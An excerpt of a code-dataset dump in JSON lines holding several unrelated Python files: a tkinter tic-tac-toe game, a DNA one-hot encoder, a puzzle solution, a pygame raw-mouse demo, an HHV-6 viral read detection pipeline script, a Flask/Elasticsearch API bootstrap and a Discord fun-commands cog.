self.av_tiles_pos = list(self.tiles.keys())\n self.player = 'player'\n # print(self.av_tiles_pos)\n\n def close_game_frame(self):\n self.game_frame.destroy()\n self.root.destroy()\n\n def player_click(self, who_clicked):\n try:\n self.av_tiles_pos.remove(who_clicked)\n except:\n pass\n # print(who_clicked, self.av_tiles_pos)\n self.player = 'computer'\n if not (self.check() == True):\n time.sleep(0.5)\n self.computer_turn()\n else:\n self.end_game()\n\n def computer_turn(self):\n try:\n computer_choice = random.choice(self.av_tiles_pos)\n self.av_tiles_pos.remove(computer_choice)\n self.tiles[computer_choice].computer_click()\n self.player = 'player'\n except:\n pass\n if self.check() == True:\n for elem in self.av_tiles_pos:\n self.tiles[elem].unbind()\n self.end_game()\n\n def check(self):\n if len(self.av_tiles_pos) >= 0:\n # vertical stripes\n # x00|x00|x00\n if self.tiles[(0,0)].owner == self.tiles[(0,1)].owner == self.tiles[(0,2)].owner:\n if self.tiles[(0,0)].owner == 'player':\n 
self.winner('player')\n return True\n elif self.tiles[(0,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 0x0|0x0|0x0\n if self.tiles[(1,0)].owner == self.tiles[(1,1)].owner == self.tiles[(1,2)].owner:\n if self.tiles[(1,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(1,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 00x|00x|00x\n if self.tiles[(2,0)].owner == self.tiles[(2,1)].owner == self.tiles[(2,2)].owner:\n if self.tiles[(2,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(2,0)].owner == 'computer':\n self.winner('computer')\n return True\n # horizontal stripes\n # xxx|000|000\n if self.tiles[(0,0)].owner == self.tiles[(1,0)].owner == self.tiles[(2,0)].owner:\n if self.tiles[(0,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 000|xxx|000\n if self.tiles[(0,1)].owner == self.tiles[(1,1)].owner == self.tiles[(2,1)].owner:\n if self.tiles[(0,1)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,1)].owner == 'computer':\n self.winner('computer')\n return True\n # 000|000|xxx\n if self.tiles[(0,2)].owner == self.tiles[(1,2)].owner == self.tiles[(2,2)].owner:\n if self.tiles[(0,2)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,2)].owner == 'computer':\n self.winner('computer')\n return True\n # special stripes\n # x00|0x0|00x\n if self.tiles[(0,0)].owner == self.tiles[(1,1)].owner == self.tiles[(2,2)].owner:\n if self.tiles[(0,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 00x|0x0|x00\n if self.tiles[(0,2)].owner == self.tiles[(1,1)].owner == self.tiles[(2,0)].owner:\n if self.tiles[(0,2)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,2)].owner == 'computer':\n self.winner('computer')\n return True\n \n if len(self.av_tiles_pos) == 0:\n self.winner('tie')\n return True\n \n def winner(self, winner):\n self.txt = ''\n if winner == 'player':\n self.txt = 'You won!'\n elif winner == 'computer':\n self.txt = 'Computer won!'\n elif winner == 'tie':\n self.txt = \"It's a tie\"\n \n def end_game(self):\n def onclose(event=None):\n self.popup.destroy()\n self.start_game()\n \n self.popup = Toplevel()\n self.popup.title('Game ends')\n self.popup.geometry(\"200x100\")\n self.info_pop = Label(self.popup, text = self.txt)\n self.info_pop.pack(pady = 10)\n self.info_button = Button(self.popup, text='Okay')\n self.info_button.pack(side=BOTTOM, pady=10)\n self.popup.protocol(\"WM_DELETE_WINDOW\", onclose)\n self.info_button.bind('<Button-1>', onclose)\n\nif __name__ == '__main__':\n Game()","sub_path":"tictactoe/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":7801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"521375607","text":"import numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom csv import reader\nimport re\nfrom sklearn.preprocessing import LabelEncoder\n\nclass obtainDNAData():\n def __init__(self, directory):\n self.dataset_directory = directory\n self.label_encoder = LabelEncoder()\n self.label_encoder.fit(np.array(['a','c','g','t']))\n\n def special_match(self, strg, search=re.compile(r'[^atcgATCG]').search):\n return not bool(search(strg))\n\n def one_hot_encoder(self, my_array):\n integer_encoded 
= self.label_encoder.transform(my_array)\n onehot_encoder = OneHotEncoder(categories=[range(5)], sparse=False, dtype=int)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n onehot_encoded = np.delete(onehot_encoded, -1, 1)\n return onehot_encoded\n\n #Returns train_data, test_data\n def obtainData(self):\n\n # open file in read mode\n with open(self.dataset_directory, 'r') as read_obj:\n # pass the file object to reader() to get the reader object\n csv_reader = reader(read_obj)\n # Iterate over each row in the csv using reader object\n dataset_no_repeats = set()\n for row in csv_reader:\n if (self.special_match(row[2])):\n dataset_no_repeats.add(row[2].lower())\n # dataset_no_repeats = list(dataset_no_repeats)[:len(dataset_no_repeats)//5]\n dataset_no_repeats = list(dataset_no_repeats)[:2]\n print(len(dataset_no_repeats))\n # print(len(dataset_no_repeats))\n max = 0\n # A = np.pad(np.array([[0,1,0,0],[1,0,0,0]]), ((0,4-s.shape[0]),(0,0)), mode='constant')\n for i in dataset_no_repeats:\n if len(i) > max:\n max = len(i)\n data = []\n for i in dataset_no_repeats:\n arr = self.one_hot_encoder(np.array(list(i)))\n arr = np.pad(arr, ((0,max-arr.shape[0]),(0,0)), mode='constant')\n data.append(arr)\n\n test_index = round(len(data) * 0.9)\n return np.array(data[0:test_index]), np.array(data[test_index:])\n","sub_path":"VAEs/generate_dna_onehot.py","file_name":"generate_dna_onehot.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"242114164","text":"value = input()\nmodified_value = input()\nk = int(input())\nsame_value = []\nlength = len(value) if len(value) < len(modified_value) else len(modified_value) \nl = len(value) + len(modified_value)\nfor i in range(length):\n if value[i] != modified_value[i]:\n break\n same_value.append(i)\ni = len(same_value)\nprint(( \"Yes\" if l<= k+i*2 and l%2 == k%2 or l < k else \"No\"))\nprint(l)\n\n\n# Logic:\n\n# We add the lengths of both strings (l = len(value) + len(modified_value))\n# and check that total against k.\n\n# Here i is the length of the common prefix of the two strings, so the\n# i*2 matching characters never need to be deleted and re-appended;\n# everything else must fit into the k operations: l <= k + i*2.\n\n# k is the exact number of operations that must be performed, so if any\n# operations are left over after the required deletes and appends, they\n# still have to be spent. They can only be spent in delete/append pairs,\n# which forces the parity condition l%2 == k%2.\n\n# The exception is l < k: with more operations than total characters we\n# can delete the whole string (deleting from an empty string is allowed)\n# and rebuild it, so parity no longer matters.\n\n# Final condition: l <= k+i*2 and l%2 == k%2, or l < k.\n\n# The parity condition handles inputs like:\n# y\n# yu\n# 2\n# whose correct answer is No; without it the code would print Yes,\n# because k exceeds the number of visible changes and the leftover\n# operation cannot be spent.\n\n\n\n","sub_path":"append_delete.py","file_name":"append_delete.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"474022690","text":"import pygame\r\nfrom pygame.locals import *\r\nimport rawinputreader\r\n\r\nclass MousePointer(pygame.sprite.Sprite):\r\n \"\"\"A mouse-pointer sprite that moves around the screen\"\"\"\r\n def __init__(self, x, y):\r\n pygame.sprite.Sprite.__init__(self) \r\n try:\r\n self.image = pygame.image.load('mouse_pointer.png').convert_alpha()\r\n except pygame.error as message:\r\n self.image = pygame.Surface((10, 10), SRCALPHA).convert_alpha()\r\n self.image.fill((0xff, 0, 0, 0xff))\r\n self.rect = self.image.get_rect()\r\n self.rect.move_ip(x, y)\r\n\r\npygame.init()\r\n\r\ndisplay_flags = 0*DOUBLEBUF | 1*FULLSCREEN | HWSURFACE\r\nwidth, height = pygame.display.list_modes()[0] \r\n\r\nscreen = pygame.display.set_mode((width, height), display_flags)\r\npygame.mouse.set_visible(False)\r\n\r\nid2mice = {}\r\n\r\nmouse_sprites = pygame.sprite.RenderUpdates()\r\n\r\nbackground = pygame.Surface(screen.get_size())\r\nbackground = background.convert()\r\nbackground.fill((32,32,64))\r\n\r\nscreen.blit(background, (0, 0))\r\npygame.display.update()\r\n\r\nclock = pygame.time.Clock()\r\n\r\nrir = rawinputreader.rawinputreader()\r\n\r\nrun = True\r\nwhile run:\r\n\r\n events = pygame.event.get()\r\n\r\n for event in events:\r\n if (event.type == QUIT or \r\n (event.type == KEYDOWN and event.key in [K_ESCAPE, K_q])):\r\n run = False\r\n\r\n rir_events = rir.pollEvents()\r\n for rir_event in rir_events:\r\n (id, \r\n usflags, ulbuttons, usbuttonflags, usbuttondata, ulrawbuttons, \r\n x, y, extra) = rir_event\r\n button_event = rawinputreader.eventTupleToButton(rir_event)\r\n if not id in id2mice:\r\n mouse = MousePointer(width/2, height/2)\r\n id2mice[id] = mouse\r\n mouse_sprites.add(mouse)\r\n else:\r\n mouse = id2mice[id]\r\n button_action, button = button_event\r\n if button_action != (rawinputreader.NO_BUTTON):\r\n print(button_event)\r\n mouse.rect.move_ip(x, y)\r\n mouse.rect.clamp_ip(screen.get_rect())\r\n\r\n mouse_sprites.clear(screen, background)\r\n mouse_sprites.update() # Calls update on all sprites\r\n dirty = mouse_sprites.draw(screen)\r\n pygame.display.update(dirty)\r\n\r\n clock.tick(40)\r\n\r\nrir.stop() # Must currently be called before ending program :-(\r\n\r\n","sub_path":"pygamedemo.py","file_name":"pygamedemo.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"318947468","text":"#!/usr/bin/env python\n\"\"\"\nAPI bootstrap file\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport logging\nfrom flask import Flask, jsonify, g\nfrom flask.ext.login import LoginManager, current_user\nfrom elasticsearch import Elasticsearch, TransportError\n\nsys.path.insert(0, os.path.dirname(\n os.path.realpath(__file__)) + '/../../../../lib')\n\nfrom example.v1.lib.user import User\n\nAPP_SECRET_KEY = os.urandom(32)\n\nlogger = logging.getLogger(__name__)\n\nlogin_manager = LoginManager()\n\n#ELASTICSEARCH_HOST = '127.0.0.1'\n#ELASTICSEARCH_PORT = 
9200\n\n@login_manager.user_loader\ndef load_user(email_address):\n try:\n user = User(email_address=email_address)\n except ValueError as error:\n message = str(error)\n logger.warn(message)\n return None\n data = {}\n try:\n data = g.db_client.get('example', user.key)\n except (TransportError, Exception) as error:\n if not getattr(error, 'status_code', None) == 404:\n logger.critical(str(error))\n return None\n if not data.get('found', None):\n message = \"'%s' does not exist.\" % email_address\n logger.warn(message)\n return None\n user.set_values(values=data['_source'])\n return user\n\n\ndef connect_db():\n \"\"\" connect to couchbase \"\"\"\n try:\n db_client = Elasticsearch()\n #[{'host': ELASTICSEARCH_HOST, 'port': ELASTICSEARCH_PORT}],\n #use_ssl=True,)\n #sniff_on_connection_fail=True,)\n except Exception as error:\n logger.critical(error)\n raise\n return db_client\n\n\ndef create_app():\n \"\"\" dynamically create the app \"\"\"\n #app = Flask(__name__, static_url_path='')\n app = Flask(__name__)\n app.config.from_object(__name__)\n app.secret_key = APP_SECRET_KEY\n login_manager.init_app(app)\n\n @app.before_request\n def before_request():\n \"\"\" create the db_client global if it does not exist \"\"\"\n if not hasattr(g, 'db_client'):\n g.db_client = connect_db()\n if not hasattr(g, 'user'):\n g.user = current_user\n\n\n def default_error_handle(error=None):\n \"\"\" create a default json error handle \"\"\"\n return jsonify(error=str(error), message=error.description,\n success=False), error.code\n\n ## handle all errors with json output\n for error in range(400, 420) + range(500, 506):\n app.error_handler_spec[None][error] = default_error_handle\n\n ## add each api Blueprint and create the base route\n from example.v1.api.auth.views import auth\n app.register_blueprint(auth, url_prefix=\"/v1/auth\")\n from example.v1.api.users.views import users\n app.register_blueprint(users, url_prefix=\"/v1/users\")\n from example.v1.api.test.views import test\n app.register_blueprint(test, url_prefix=\"/v1/test\")\n\n return app\n\n\ndef bootstrap(**kwargs):\n \"\"\"bootstraps the application. can handle setup here\"\"\"\n app = create_app()\n app.debug = True\n app.run(host=kwargs['host'], port=kwargs['port'])\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.DEBUG,\n format=(\"%(asctime)s %(levelname)s %(name)s[%(process)s] : %(funcName)s\"\n \" : %(message)s\"),\n #filename='/var/log/AAA/%s.log' % FILE_NAME\n )\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--host\", help=\"Hostname or IP address\", dest=\"host\",\n type=str, default='0.0.0.0')\n parser.add_argument(\"--port\", help=\"Port number\", dest=\"port\", type=int,\n default=8000)\n args = parser.parse_args()\n bootstrap(**args.__dict__)\n","sub_path":"lib/example/v1/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"377929864","text":"#!/usr/bin/env python\n\n'''\nCopyright (c) 2020 RIKEN\nAll Rights Reserved\nSee file LICENSE for details.\n'''\n\n\nimport os,sys,datetime,argparse,glob,logging\n\n\n# version\nversion='2021/April/27'\n\n\n# HHV-6 refseq IDs\nhhv6a_refid='NC_001664.4'\nhhv6b_refid='NC_000898.1'\n\n\n# args\nparser=argparse.ArgumentParser(description='')\nparser.add_argument('-alignmentin', help='Optional. Specify if you use BAM/CRAM file for input. 
You also need to specify either -b or -c.', action='store_true')\nparser.add_argument('-b', metavar='str', type=str, help='Either -b or -c is Required. Specify input mapped paired-end BAM file.')\nparser.add_argument('-c', metavar='str', type=str, help='Either -b or -c is Required. Specify input mapped paired-end CRAM file.')\nparser.add_argument('-fa', metavar='str', type=str, help='Required. Specify reference genome which are used when input reads were mapped. Example: GRCh38DH.fa')\nparser.add_argument('-use_mate_mapped', help='Optional. Specify if you use unmapped reads with their mate was mapped. Otherwise, only both R1 and R2 unmapped will be used by default.', action='store_true')\nparser.add_argument('-all_discordant', help='Optional. Specify if you use all discordant reads, including not-properly paired reads. Otherwise, only both R1 and R2 unmapped will be used by default.', action='store_true')\nparser.add_argument('-fastqin', help='Optional. Specify if you use unmapped reads for input instead of BAM/CRAM file. You also need to specify -fq1 and -fq2.', action='store_true')\nparser.add_argument('-single', help='Optional. Specify if you use single-end unmapped reads for input instead of BAM/CRAM file. Only works when specifing -fastqin option. You also need to specify -fq1.', action='store_true')\nparser.add_argument('-fq1', metavar='str', type=str, help='Specify unmapped fastq file, read-1 of read pairs.')\nparser.add_argument('-fq2', metavar='str', type=str, help='Specify unmapped fastq file, read-2 of read pairs.')\nparser.add_argument('-ONT_bamin', help='Optional. Specify if you use BAM file with ONT long reads.', action='store_true')\nparser.add_argument('-ONT_bam', help='Optional. Specify BAM file with ONT long reads. This must be position-sorted.')\nparser.add_argument('-ONT_recon_min_depth', metavar='int', type=int, help='Optional. Specify a number (interger) of minimum reads required for local HHV-6 sequence reconstruction.')\nparser.add_argument('-vref', metavar='str', type=str, help='Required. Specify reference of virus genomes, including HHV-6A and B. Example: viral_genomic_200405.fa')\nparser.add_argument('-vrefindex', metavar='str', type=str, help='Required. Specify hisat2 index of virus genomes, including HHV-6A and B. Example: viral_genomic_200405')\nparser.add_argument('-depth', metavar='int', type=int, help='Optional. Average depth of input BAM/CRAM file. Only available when using WGS data. If this option is true, will output virus_read_depth/chromosome_depth as well.')\nparser.add_argument('-bwa', help='Optional. Specify if you use BWA for mapping instead of hisat2.', action='store_true')\nparser.add_argument('-denovo', help='Optional. Specify if you want to perform de-novo assembly.', action='store_true')\nparser.add_argument('-picard', metavar='str', type=str, help='Required. Specify full path to picard.jar. Example: /path/to/picard/picard.jar')\nparser.add_argument('-outdir', metavar='str', type=str, help='Optional. Specify output directory. Default: ./result_out', default='./result_out')\nparser.add_argument('-overwrite', help='Optional. Specify if you overwrite previous results.', action='store_true')\nparser.add_argument('-keep', help='Optional. Specify if you do not want to delete temporary files.', action='store_true')\nparser.add_argument('-p', metavar='int', type=int, help='Optional. Number of threads. 3 or more is recommended. 
Default: 2', default=2)\nparser.add_argument('-v', '--version', help='Print version.', action='store_true')\nparser.add_argument('-singularity', action='store_true', help=argparse.SUPPRESS)\nparser.add_argument('-remove_chr_with_no_read', action='store_true', help=argparse.SUPPRESS)\nargs=parser.parse_args()\n\n\n# start\nimport init\ninit.init(args, version)\n\n\n# logging\nimport log\nargs.logfilename='for_debug.log'\nif os.path.exists(os.path.join(args.outdir, args.logfilename)) is True:\n os.remove(os.path.join(args.outdir, args.logfilename))\nlog.start_log(args)\nlog.logger.debug('Logging started.')\n\n\n# initial check\nimport initial_check\nprint()\nlog.logger.info('You are using version \"%s\"' % version)\nlog.logger.info('Initial check started.')\ninitial_check.check(args, sys.argv, init.base)\n\n\n# set up\nimport setup\nsetup.setup(args, init.base)\nparams=setup.params\n\n\n# output file names\nimport utils\nfilenames=utils.empclass()\n\nfilenames.discordant_bam =os.path.join(args.outdir, 'discordant.bam')\nfilenames.discordant_sort_bam =os.path.join(args.outdir, 'discordant_sorted.bam')\nfilenames.unmapped_1 =os.path.join(args.outdir, 'unmapped_1.fq')\nfilenames.unmapped_2 =os.path.join(args.outdir, 'unmapped_2.fq')\nfilenames.unmapped_bam_3 =os.path.join(args.outdir, 'unmapped_3.bam')\nfilenames.unmapped_bam_4 =os.path.join(args.outdir, 'unmapped_4.bam')\nfilenames.unmapped_bam_34 =os.path.join(args.outdir, 'unmapped_34.bam')\nfilenames.unmapped_sorted_34 =os.path.join(args.outdir, 'unmapped_34_sorted.bam')\nfilenames.unmapped_3 =os.path.join(args.outdir, 'unmapped_3.fq')\nfilenames.unmapped_4 =os.path.join(args.outdir, 'unmapped_4.fq')\nfilenames.unmapped_merged_pre1=os.path.join(args.outdir, 'unmapped_merged_pre1.fq')\nfilenames.unmapped_merged_pre2=os.path.join(args.outdir, 'unmapped_merged_pre2.fq')\nfilenames.unmapped_merged_1 =os.path.join(args.outdir, 'unmapped_merged_1.fq')\nfilenames.unmapped_merged_2 =os.path.join(args.outdir, 'unmapped_merged_2.fq')\nfilenames.mapped_unsorted_bam =os.path.join(args.outdir, 'mapped_to_virus_orig.bam')\nfilenames.mapped_sorted =os.path.join(args.outdir, 'mapped_to_virus_sorted.bam')\nfilenames.mapped_to_virus_bam =os.path.join(args.outdir, 'mapped_to_virus_dedup.bam')\nfilenames.mapped_to_virus_bai =os.path.join(args.outdir, 'mapped_to_virus_dedup.bai')\nfilenames.markdup_metrix =os.path.join(args.outdir, 'mark_duplicate_metrix.txt')\nfilenames.bedgraph =os.path.join(args.outdir, 'mapped_to_virus.bedgraph')\nfilenames.summary =os.path.join(args.outdir, 'virus_detection_summary.txt')\nfilenames.high_cov_pdf =os.path.join(args.outdir, 'high_coverage_viruses.pdf')\n\nfilenames.tmp_bam =os.path.join(args.outdir, 'tmp.bam')\nfilenames.tmp_sorted_bam =os.path.join(args.outdir, 'tmp_sorted.bam')\nfilenames.tmp_bam_fq1 =os.path.join(args.outdir, 'tmp_bam_1.fq')\nfilenames.tmp_bam_fq2 =os.path.join(args.outdir, 'tmp_bam_2.fq')\nfilenames.tmp_rg_bam =os.path.join(args.outdir, 'tmp_rg.bam')\nfilenames.tmp_fa =os.path.join(args.outdir, 'tmp.fa')\nfilenames.tmp_masked_fa =os.path.join(args.outdir, 'tmp_masked.fa')\nfilenames.tmp_fa_dict =os.path.join(args.outdir, 'tmp.dict')\nfilenames.hhv6a_vcf_gz =os.path.join(args.outdir, 'hhv6a.vcf.gz')\nfilenames.hhv6a_norm_vcf_gz =os.path.join(args.outdir, 'hhv6a_norm.vcf.gz')\nfilenames.hhv6a_gatk_naive =os.path.join(args.outdir, 'hhv6a_reconstructed.fa')\nfilenames.hhv6b_vcf_gz =os.path.join(args.outdir, 'hhv6b.vcf.gz')\nfilenames.hhv6b_norm_vcf_gz =os.path.join(args.outdir, 
'hhv6b_norm.vcf.gz')\nfilenames.hhv6b_gatk_naive =os.path.join(args.outdir, 'hhv6b_reconstructed.fa')\nfilenames.hhv6a_metaspades_o =os.path.join(args.outdir, 'hhv6a_metaspades_assembly')\nfilenames.hhv6b_metaspades_o =os.path.join(args.outdir, 'hhv6b_metaspades_assembly')\n\nfilenames.hhv6_dr_ref =os.path.join(init.base, 'lib/HHV6_only_DR.fa')\nfilenames.hhv6_dr_index =os.path.join(init.base, 'lib/hisat2_index/HHV6_only_DR')\nfilenames.mapped_to_dr_bam =os.path.join(args.outdir, 'mapped_to_DR_dedup.bam')\nfilenames.mapped_to_dr_bai =os.path.join(args.outdir, 'mapped_to_DR_dedup.bai')\nfilenames.markdup_metrix_dr =os.path.join(args.outdir, 'mark_duplicate_metrix_DR.txt')\nfilenames.bedgraph_dr =os.path.join(args.outdir, 'mapped_to_DR.bedgraph')\nfilenames.summary_dr =os.path.join(args.outdir, 'mapping_DR_summary.txt')\nfilenames.high_cov_pdf_dr =os.path.join(args.outdir, 'coverage_DR.pdf')\n\nfilenames.hhv6a_dr_vcf_gz =os.path.join(args.outdir, 'hhv6a_DR.vcf.gz')\nfilenames.hhv6a_dr_norm_vcf_gz=os.path.join(args.outdir, 'hhv6a_DR_norm.vcf.gz')\nfilenames.hhv6a_dr_gatk_naive =os.path.join(args.outdir, 'hhv6a_DR_reconstructed.fa')\nfilenames.hhv6b_dr_vcf_gz =os.path.join(args.outdir, 'hhv6b_DR.vcf.gz')\nfilenames.hhv6b_dr_norm_vcf_gz=os.path.join(args.outdir, 'hhv6b_DR_norm.vcf.gz')\nfilenames.hhv6b_dr_gatk_naive =os.path.join(args.outdir, 'hhv6b_DR_reconstructed.fa')\n\n\nif args.ONT_bamin is False:\n # 0. Unmapped read retrieval\n if args.alignmentin is True:\n import retrieve_unmapped\n log.logger.info('Unmapped read retrieval started.')\n retrieve_unmapped.retrieve_unmapped_reads(args, params, filenames)\n elif args.fastqin is True:\n log.logger.info('Unmapped read retrieval skipped. Read1=%s, read2=%s.' % (args.fq1, args.fq2))\n if args.single is False:\n filenames.unmapped_merged_1=args.fq1\n filenames.unmapped_merged_2=args.fq2\n else:\n filenames.unmapped_merged_1=args.fq1\n\n # 1. mapping\n import mapping\n log.logger.info('Mapping of unmapped reads started.')\n mapping.map_to_viruses(args, params, filenames)\n if args.alignmentin is True:\n utils.gzip_or_del(args, params, filenames.unmapped_merged_1)\n utils.gzip_or_del(args, params, filenames.unmapped_merged_2)\n\nif (args.ONT_bamin is False and mapping.read_mapped is True) or args.ONT_bamin is True:\n if args.ONT_bamin is True:\n import mapping\n filenames.mapped_to_virus_bam=args.ONT_bam\n if args.remove_chr_with_no_read is True:\n log.logger.info('Removing chrs without reads.')\n mapping.remove_chrs_no_read(args, params, filenames, hhv6a_refid, hhv6b_refid)\n log.logger.info('BAM to bedgraph conversion started.')\n mapping.bam_to_bedgraph(args, params, filenames)\n \n # 2. identify high coverage viruses\n import identify_high_cov\n log.logger.info('Identification of high-coverage viruses started.')\n identify_high_cov.identify_high_cov_virus_from_bedgraph(args, params, filenames)\n \n # 3. reconstruct HHV-6\n import reconstruct_hhv6,reconstruct_hhv6_dr\n if args.ONT_bamin is True:\n identify_high_cov.judge_AB(args, params, filenames, identify_high_cov.hhv6a_highcov, identify_high_cov.hhv6b_highcov)\n if identify_high_cov.hhv6a_highcov is True:\n log.logger.info('HHV-6A full sequence reconstruction started.')\n reconstruct_hhv6.reconst_a(args, params, filenames, hhv6a_refid)\n if args.ONT_bamin is True:\n log.logger.info('ONT_bamin was specified. 
DR reconstruction skipped.')\n else:\n log.logger.info('HHV-6A DR sequence reconstruction started.')\n reconstruct_hhv6_dr.map_to_dr(args, params, filenames, hhv6a_refid)\n reconstruct_hhv6_dr.output_summary(args, params, filenames)\n reconstruct_hhv6_dr.reconst_a(args, params, filenames, hhv6a_refid)\n if identify_high_cov.hhv6b_highcov is True:\n log.logger.info('HHV-6B full sequence reconstruction started.')\n reconstruct_hhv6.reconst_b(args, params, filenames, hhv6b_refid)\n if args.ONT_bamin is True:\n log.logger.info('ONT_bamin was specified. DR reconstruction skipped.')\n else:\n log.logger.info('HHV-6B DR sequence reconstruction started.')\n reconstruct_hhv6_dr.map_to_dr(args, params, filenames, hhv6b_refid)\n reconstruct_hhv6_dr.output_summary(args, params, filenames)\n reconstruct_hhv6_dr.reconst_b(args, params, filenames, hhv6b_refid)\n if args.keep is False:\n if args.ONT_bamin is False:\n os.remove(filenames.mapped_to_virus_bai)\n if os.path.exists(filenames.mapped_to_dr_bai) is True:\n os.remove(filenames.mapped_to_dr_bai)\nelse:\n log.logger.info('No read was mapped.')\n\nlog.logger.info('All analysis finished!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"400321244","text":"from string import ascii_lowercase\n\nALPHA_RADIX = 26\n\n\ndef alphabetic_to_decimal(s):\n curr_pow = len(s) - 1\n decimal = 0\n lst = list(map((lambda c: ord(c) - ord('a')), s))\n for val in lst:\n decimal += val * pow(ALPHA_RADIX, curr_pow)\n curr_pow -= 1\n return decimal\n\n\ndef decimal_to_alphabetic(num, str_len):\n alphabet = ascii_lowercase\n alphabetic = ''\n while num:\n alphabetic = alphabet[num % ALPHA_RADIX] + alphabetic\n num //= ALPHA_RADIX\n return alphabetic.rjust(str_len, 'a') if len(alphabetic) < str_len else alphabetic\n","sub_path":"Client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"323089023","text":"with open(\"input.txt\", \"r\") as inputFile:\n with open(\"output.txt\", \"w\") as outputFile:\n inputFile.readline()\n count = 0\n for line in inputFile:\n count += 1 \n chars = list(line.rstrip('\\n'))\n simulated = [chars[0]]\n for i in range(1, len(chars)):\n if chars[i] >= simulated[0]:\n simulated.insert(0, chars[i])\n else:\n simulated.append(chars[i])\n result = \"\".join(i for i in simulated)\n outputFile.write(\"Case #{}: {}\\n\".format(count, result))\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_matyukhin_last_word.py","file_name":"16_1_1_matyukhin_last_word.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"414813390","text":"import random\nimport aiohttp\nimport discord\nfrom discord.ext import tasks, commands\n\n\nclass fun(commands.Cog):\n db = 'fun.db'\n\n def __init__(self, bot):\n self.bot = bot\n\n async def cog_command_error(self, ctx, error):\n print('Error in {0.command.qualified_name}: {1}'.format(ctx, error))\n\n @commands.command(help=\"Show the comic of the day. 
Can also call :xkcd random\")\n async def xkcd(self, ctx, *searchterm: str):\n apiUrl = 'https://xkcd.com{}info.0.json'\n async with aiohttp.ClientSession() as cs:\n async with cs.get(apiUrl.format('/')) as r:\n js = await r.json()\n if ''.join(searchterm) == 'random':\n randomComic = random.randint(0, js['num'])\n async with cs.get(apiUrl.format('/' + str(randomComic) + '/')) as r:\n if r.status == 200:\n js = await r.json()\n comicUrl = 'https://xkcd.com/{}/'.format(js['num'])\n date = '{}.{}.{}'.format(js['day'], js['month'], js['year'])\n msg = '**{}**\\n{}\\nAlt Text:```{}```XKCD Link: <{}> ({})'.format(js['safe_title'], js['img'], js['alt'],\n comicUrl, date)\n await ctx.send(msg)\n\n @commands.command(name=\"fortune\", help=\"Ask the magic 8 ball\")\n async def eightball(self, ctx, *question: str):\n if not question:\n return await ctx.send('You gotta ask a question yo.')\n answers = ['It is certain.',\n 'It is decidedly so.',\n 'Without a doubt.',\n 'As I see it, yes.',\n 'Most likely.',\n 'Outlook good.',\n 'Reply hazy, try again.',\n 'Ask again later.',\n 'Better not tell you now.',\n 'Don\\'t count on it.',\n 'My reply is no.',\n 'My sources say no.',\n 'Outlook not so good.',\n 'Very doubtful.',\n 'Yes - definitely.',\n 'Yes.',\n 'Cannot predict now.',\n 'You may rely on it.',\n 'Signs point to yes.',\n 'Concentrate and ask again.']\n embed = discord.Embed(title=':8ball:', color=0x3498db) # Blue\n embed.add_field(name='Question', value=' '.join(str(i) for i in question))\n embed.add_field(name='Answer', value=random.choice(answers), inline=False)\n await ctx.send(embed=embed)\n\n @commands.command(help=\"Boo not cool reaction\")\n async def boo(self, ctx):\n await ctx.send(\"https://thumbs.gfycat.com/GiddyEveryEmperorpenguin-size_restricted.gif\")\n\n @commands.command(help=\"fuck you\")\n async def fu(self, ctx):\n await ctx.send(\"https://tenor.com/view/rick-and-morty-peace-gif-10532165\")\n\n\ndef setup(bot):\n bot.add_cog(fun(bot))\n","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
